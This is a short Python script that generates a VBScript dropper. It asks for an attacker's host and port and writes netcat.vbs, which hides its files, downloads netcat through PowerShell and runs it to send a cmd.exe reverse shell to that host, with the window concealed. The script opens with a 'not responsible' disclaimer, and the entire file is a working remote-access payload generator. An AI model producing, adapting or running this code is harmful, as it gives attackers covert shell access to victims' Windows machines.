print("i am not responsible for how you use this software")
LHOST = input("what is your LHOST:")
LPORT = input("what is your LPORT:")
print("the vbs file will be in the active directory")

f = open("netcat.vbs", "w+")
f.write("Option Explicit\n")
f.write("dim x, fs, bat\n")
f.write("set x = CreateObject(\"wscript.shell\")\n")
f.write("set fs = CreateObject(\"scripting.FileSystemObject\")\n")
f.write("fs.CreateTextFile \".\\nc.bat\"\n")
f.write("Set bat = fs.OpenTextFile(\"./nc.bat\", 2)\n")
f.write("bat.WriteLine\"attrib +h reverse-nc.vbs\"\n")
f.write("bat.WriteLine\"attrib +h nc.bat\"\n")
f.write("bat.WriteLine\"mkdir win\"\n")
f.write("bat.WriteLine\"attrib +h win\"\n")
f.write("bat.WriteLine\"cd win\"\n")
f.write("bat.WriteLine\"powershell Invoke-WebRequest https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -OutFile netcat.zip\"\n")
f.write("bat.WriteLine\"powershell Expand-Archive netcat.zip netcat\"\n")
f.write("bat.WriteLine\"cd netcat\"\n")
f.write("bat.WriteLine\"cd netcat-1.11\"\n")
f.write("bat.WriteLine\"nc ")
f.write(str(LHOST))
f.write(" ")
f.write(str(LPORT))
f.write(" -e c:\Windows\System32\cmd.exe\"\n")
f.write("bat.Close\n")
f.write("x.run chr(34) & \".\\nc.bat\" & chr(34), 0\n")
f.write("set x = Nothing\n")
f.close()